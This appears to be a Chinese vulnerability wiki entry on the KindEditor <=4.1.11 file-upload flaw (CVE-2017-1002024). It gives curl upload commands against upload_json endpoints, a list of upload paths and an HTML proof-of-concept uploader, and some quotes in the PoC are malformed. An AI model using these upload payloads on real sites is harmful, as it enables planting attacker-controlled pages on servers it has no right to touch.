跳转至

(CVE-2017-1002024)Kindeditor \<=4.1.11 上传漏洞

一、漏洞简介

漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.11编辑器中

二、漏洞影响

Kindeditor \<=4.1.11

三、复现过程

curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/php/upload_json.php?dir=file
curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/asp/upload_json.asp?dir=file
curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/jsp/upload_json.jsp?dir=file
curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/aspx/upload_json.aspx?dir=file 
​```返回值为路径 

json文件地址

/asp/upload_json.asp

/asp.net/upload_json.ashx

/jsp/upload_json.jsp

/php/upload_json.php

上传路径

kindeditor/asp/upload_json.asp?dir=file

kindeditor/asp.net/upload_json.ashx?dir=file

kindeditor/jsp/upload_json.jsp?dir=file

kindeditor/php/upload_json.php?dir=file

查看版本信息

http://www.0-sec.org/kindeditor//kindeditor.js

构造poc

&lt;html&gt;&lt;head&gt;
&lt;title&gt;Uploader&lt;/title&gt;
&lt;script src="http://www.0-sec.org/kindeditor//kindeditor.js"&gt;&lt;/script&gt;
&lt;script&gt;
KindEditor.ready(function(K) {
var uploadbutton = K.uploadbutton({
button : K(‘#uploadButton‘)[0],
fieldName : ‘imgFile‘,
url : ‘http://www.0-sec.org/kindeditor/jsp/upload_json.jsp?dir=file‘,
afterUpload : function(data) {
if (data.error === 0) {
var url = K.formatUrl(data.url, ‘absolute‘);
K(‘#url‘).val(url);}
},
});
uploadbutton.fileBox.change(function(e) {
uploadbutton.submit();
});
});
&lt;/script&gt;&lt;/head&gt;&lt;body&gt;
&lt;div&gt;
&lt;input class="ke-input-text" type="text" id="url" value="" readonly="readonly" /&gt;
&lt;input type="button" id="uploadButton" value="Upload" /&gt;
&lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;